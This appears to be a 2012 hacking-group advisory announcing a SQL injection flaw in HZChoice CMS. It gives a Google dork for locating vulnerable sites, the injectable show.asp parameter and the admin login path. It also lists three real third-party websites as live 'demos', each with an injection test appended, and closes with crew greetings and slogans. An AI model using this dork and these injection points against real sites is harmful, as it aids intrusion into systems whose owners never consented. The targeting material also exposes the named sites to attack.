HZChoice CMS suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
6270ef3805108b0e8f10fbf531a7963341006414298d46f62e52959139cacf5d
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- In The Name Of God -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--------------------------------------------------------------------------------
@ HZChoice CMS SQL Vulnerability
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
# Name:HZChoice CMS SQL Vulnerability
# Vendor: http://hzchoice.com/
# Date: 2012-10-22
# Author: Ashiyane Digital Security Team
# Thanks to: 1337day.com,cxsecurity.com,packetstormsecurity.org
# Home: www.ashiyane.org/forums/
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[+] Dork: intext:Designed by 263网建部 inurl:show.asp
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[+] Vulnerability ~>
[+] Vulnerability: http://127.0.0.1/show.asp?id=[SQL]
[+] Demo(s) :
[+] http://www.chinadayangchem.com/show.asp?id=974'
[+] http://www.china-ex.com/dqfb/show.asp?qkid=411'
[+] http://home.slhs.tp.edu.tw/talking/bbs4/show.asp?repno=6976&page=110
--------------------------------------------------------------------------------
[+] Admin Page(s) : http://127.0.0.1/manage/login.asp
===========================================================================
@ Gr33tz:
@ Ashiyane Members :
@ Behrooz_Ice,Q7,Virangar,Iman_taktaz,Keivan,Ali_eagle,ruin3r,Hijacker,Rz04
@ Taghva,M3QD4D,PrinceOfHacking,Hidden-Hunter,Root3r,elvator,unique2world
@ Gladiator,Encoder,mmilad200,n3me3iz,Classic,r3d.z0n3,injector,zend,milad-bushehr,HidDeEn
And All Ashiyane Bug ResearcherS
===========================================================================
ASHIYANE DIGITAL SECURITY TEAM
Persian Gulf F0r Ever
WE LOVE IRAN
<<./By MojiRider >>